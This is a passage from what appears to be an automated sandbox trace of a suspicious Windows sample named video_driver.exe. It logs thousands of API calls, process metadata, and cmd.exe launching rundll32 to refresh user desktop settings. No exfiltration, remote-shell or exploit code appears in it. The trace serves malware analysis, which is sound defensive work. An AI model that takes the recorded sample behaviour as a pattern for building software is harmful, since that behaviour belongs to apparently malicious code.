Flags=0x0, Ptr=0x7507f0, Size=0x6e) returned 0x7507f0 [0041.444] GetProcessHeap () returned 0x750000 [0041.444] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7507f0) returned 0x6e [0041.444] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0041.447] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.447] GetProcessHeap () returned 0x750000 [0041.447] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x120) returned 0x763450 [0041.447] GetProcessHeap () returned 0x750000 [0041.447] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x238) returned 0x750868 [0041.455] GetProcessHeap () returned 0x750000 [0041.455] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x750868, Size=0x122) returned 0x750868 [0041.455] GetProcessHeap () returned 0x750000 [0041.455] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x750868) returned 0x122 [0041.455] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.455] GetProcessHeap () returned 0x750000 [0041.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe0) returned 0x763578 [0041.456] GetProcessHeap () returned 0x750000 [0041.456] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x763578, Size=0x76) returned 0x763578 [0041.456] GetProcessHeap () returned 0x750000 [0041.456] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x763578) returned 0x76 [0041.457] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.457] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x32eb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb54) returned 0xffffffff [0041.457] GetLastError () returned 0x2 [0041.457] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE.*", fInfoLevelId=0x1, lpFindFileData=0x32eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb34) returned 0xffffffff [0041.457] GetLastError () returned 0x2 [0041.457] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x32eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb34) returned 0xffffffff [0041.457] GetLastError () returned 0x2 [0041.457] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.458] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x32eb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb54) returned 0x7635f8 [0041.458] GetProcessHeap () returned 0x750000 [0041.458] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x763638 [0041.458] FindClose (in: hFindFile=0x7635f8 | out: hFindFile=0x7635f8) returned 1 [0041.458] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0041.458] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0041.458] GetConsoleTitleW (in: lpConsoleTitle=0x32f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0041.458] InitializeProcThreadAttributeList (in: lpAttributeList=0x32eeb4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32ef7c | out: lpAttributeList=0x32eeb4, lpSize=0x32ef7c) returned 1 [0041.458] UpdateProcThreadAttribute (in: lpAttributeList=0x32eeb4, dwFlags=0x0, Attribute=0x60001, lpValue=0x32ef74, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32eeb4, lpPreviousValue=0x0) returned 1 [0041.458] GetStartupInfoW (in: lpStartupInfo=0x32ee70 | out: lpStartupInfo=0x32ee70*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x751a0c, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0041.458] GetProcessHeap () returned 0x750000 [0041.458] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x763658 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0041.458] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0041.459] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0041.460] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0041.460] GetProcessHeap () returned 0x750000 [0041.460] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x763658 | out: hHeap=0x750000) returned 1 [0041.460] GetProcessHeap () returned 0x750000 [0041.460] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa) returned 0x75ff98 [0041.460] lstrcmpW (lpString1="\\rundll32.exe", lpString2="\\XCOPY.EXE") returned -1 [0041.461] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\rundll32.exe", lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32ef10*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32ef5c | out: lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessInformation=0x32ef5c*(hProcess=0x78, hThread=0x74, dwProcessId=0x79c, dwThreadId=0x634)) returned 1 [0041.474] CloseHandle (hObject=0x74) returned 1 [0041.474] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0041.474] GetProcessHeap () returned 0x750000 [0041.474] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x765f78 | out: hHeap=0x750000) returned 1 [0041.474] GetEnvironmentStringsW () returned 0x765f78* [0041.475] GetProcessHeap () returned 0x750000 [0041.475] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb36) returned 0x764158 [0041.475] FreeEnvironmentStringsW (penv=0x765f78) returned 1 [0041.475] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0041.909] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x32ee50 | out: lpExitCode=0x32ee50*=0x0) returned 1 [0041.909] CloseHandle (hObject=0x78) returned 1 [0041.909] _vsnwprintf (in: _Buffer=0x32ef98, _BufferCount=0x13, _Format="%08X", _ArgList=0x32ee5c | out: _Buffer="00000000") returned 8 [0041.909] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0041.909] GetProcessHeap () returned 0x750000 [0041.909] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x764158 | out: hHeap=0x750000) returned 1 [0041.909] GetEnvironmentStringsW () returned 0x764158* [0041.909] GetProcessHeap () returned 0x750000 [0041.910] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb5c) returned 0x769620 [0041.910] FreeEnvironmentStringsW (penv=0x764158) returned 1 [0041.910] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0041.910] GetProcessHeap () returned 0x750000 [0041.910] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x769620 | out: hHeap=0x750000) returned 1 [0041.910] GetEnvironmentStringsW () returned 0x764158* [0041.910] GetProcessHeap () returned 0x750000 [0041.910] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb5c) returned 0x769620 [0041.910] FreeEnvironmentStringsW (penv=0x764158) returned 1 [0041.910] GetProcessHeap () returned 0x750000 [0041.910] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x75ff98 | out: hHeap=0x750000) returned 1 [0041.910] DeleteProcThreadAttributeList (in: lpAttributeList=0x32eeb4 | out: lpAttributeList=0x32eeb4) [0041.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.910] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0041.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.910] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49df41ac | out: lpMode=0x49df41ac) returned 1 [0041.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.911] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49df41b0 | out: lpMode=0x49df41b0) returned 1 [0041.911] SetConsoleInputExeNameW () returned 0x1 [0041.911] GetConsoleOutputCP () returned 0x1b5 [0041.911] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49df4260 | out: lpCPInfo=0x49df4260) returned 1 [0041.919] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.919] exit (_Code=0) Process: id = "12" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x48b96000" os_pid = "0x79c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x5d4" cmd_line = "RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x634 Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x483ad000" os_pid = "0x484" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0x318 [0042.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x37fe6c | out: lpSystemTimeAsFileTime=0x37fe6c*(dwLowDateTime=0xff593f80, dwHighDateTime=0x1d623ff)) [0042.009] GetCurrentProcessId () returned 0x484 [0042.009] GetCurrentThreadId () returned 0x318 [0042.009] GetTickCount () returned 0x11458ea [0042.009] QueryPerformanceCounter (in: lpPerformanceCount=0x37fe64 | out: lpPerformanceCount=0x37fe64*=16214296020) returned 1 [0042.010] GetModuleHandleA (lpModuleName=0x0) returned 0x4ab80000 [0042.010] __set_app_type (_Type=0x1) [0042.011] __p__fmode () returned 0x770331f4 [0042.011] __p__commode () returned 0x770331fc [0042.011] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aba21a6) returned 0x0 [0042.011] __getmainargs (in: _Argc=0x4aba4238, _Argv=0x4aba4240, _Env=0x4aba423c, _DoWildCard=0, _StartInfo=0x4aba4140 | out: _Argc=0x4aba4238, _Argv=0x4aba4240, _Env=0x4aba423c) returned 0 [0042.011] GetCurrentThreadId () returned 0x318 [0042.011] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x318) returned 0x60 [0042.011] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.011] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0042.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.012] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x37fdfc | out: phkResult=0x37fdfc*=0x0) returned 0x2 [0042.012] VirtualQuery (in: lpAddress=0x37fe33, lpBuffer=0x37fdcc, dwLength=0x1c | out: lpBuffer=0x37fdcc*(BaseAddress=0x37f000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0042.012] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x37fdcc, dwLength=0x1c | out: lpBuffer=0x37fdcc*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0042.012] VirtualQuery (in: lpAddress=0x281000, lpBuffer=0x37fdcc, dwLength=0x1c | out: lpBuffer=0x37fdcc*(BaseAddress=0x281000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0042.012] VirtualQuery (in: lpAddress=0x283000, lpBuffer=0x37fdcc, dwLength=0x1c | out: lpBuffer=0x37fdcc*(BaseAddress=0x283000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0042.012] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x37fdcc, dwLength=0x1c | out: lpBuffer=0x37fdcc*(BaseAddress=0x380000, AllocationBase=0x380000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0042.012] GetConsoleOutputCP () returned 0x1b5 [0042.012] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aba4260 | out: lpCPInfo=0x4aba4260) returned 1 [0042.012] SetConsoleCtrlHandler (HandlerRoutine=0x4ab9e72a, Add=1) returned 1 [0042.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.012] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0042.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.013] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aba41ac | out: lpMode=0x4aba41ac) returned 1 [0042.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.013] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.013] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.013] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aba41b0 | out: lpMode=0x4aba41b0) returned 1 [0042.013] GetEnvironmentStringsW () returned 0x1020d0* [0042.013] GetProcessHeap () returned 0xf0000 [0042.013] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xaca) returned 0x102ba8 [0042.014] FreeEnvironmentStringsW (penv=0x1020d0) returned 1 [0042.014] GetProcessHeap () returned 0xf0000 [0042.014] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x4) returned 0x101870 [0042.014] GetEnvironmentStringsW () returned 0x1020d0* [0042.014] GetProcessHeap () returned 0xf0000 [0042.014] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xaca) returned 0x103680 [0042.014] FreeEnvironmentStringsW (penv=0x1020d0) returned 1 [0042.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37ed6c | out: phkResult=0x37ed6c*=0x68) returned 0x0 [0042.014] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x0, lpData=0x37ed78*=0x0, lpcbData=0x37ed70*=0x1000) returned 0x2 [0042.014] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x1, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.014] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x0, lpData=0x37ed78*=0x1, lpcbData=0x37ed70*=0x1000) returned 0x2 [0042.014] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x0, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x40, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x40, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x0, lpData=0x37ed78*=0x40, lpcbData=0x37ed70*=0x1000) returned 0x2 [0042.015] RegCloseKey (hKey=0x68) returned 0x0 [0042.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37ed6c | out: phkResult=0x37ed6c*=0x68) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x0, lpData=0x37ed78*=0x40, lpcbData=0x37ed70*=0x1000) returned 0x2 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x1, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x0, lpData=0x37ed78*=0x1, lpcbData=0x37ed70*=0x1000) returned 0x2 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x0, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x9, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x4, lpData=0x37ed78*=0x9, lpcbData=0x37ed70*=0x4) returned 0x0 [0042.015] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37ed74, lpData=0x37ed78, lpcbData=0x37ed70*=0x1000 | out: lpType=0x37ed74*=0x0, lpData=0x37ed78*=0x9, lpcbData=0x37ed70*=0x1000) returned 0x2 [0042.015] RegCloseKey (hKey=0x68) returned 0x0 [0042.015] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b62 [0042.015] srand (_Seed=0x5eb34b62) [0042.015] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0042.015] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0042.016] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aba5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.016] GetProcessHeap () returned 0xf0000 [0042.016] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x210) returned 0x1020d0 [0042.016] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1020d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0042.016] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0042.016] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.016] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.016] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0042.016] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0042.016] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0042.016] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0042.016] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0042.016] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0042.016] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0042.016] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0042.016] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0042.016] GetProcessHeap () returned 0xf0000 [0042.016] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x102ba8 | out: hHeap=0xf0000) returned 1 [0042.016] GetEnvironmentStringsW () returned 0x1022e8* [0042.017] GetProcessHeap () returned 0xf0000 [0042.017] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xae2) returned 0x104c48 [0042.017] FreeEnvironmentStringsW (penv=0x1022e8) returned 1 [0042.017] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.017] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.017] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0042.017] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0042.017] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0042.017] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0042.017] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0042.017] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0042.017] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0042.017] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0042.017] GetProcessHeap () returned 0xf0000 [0042.017] 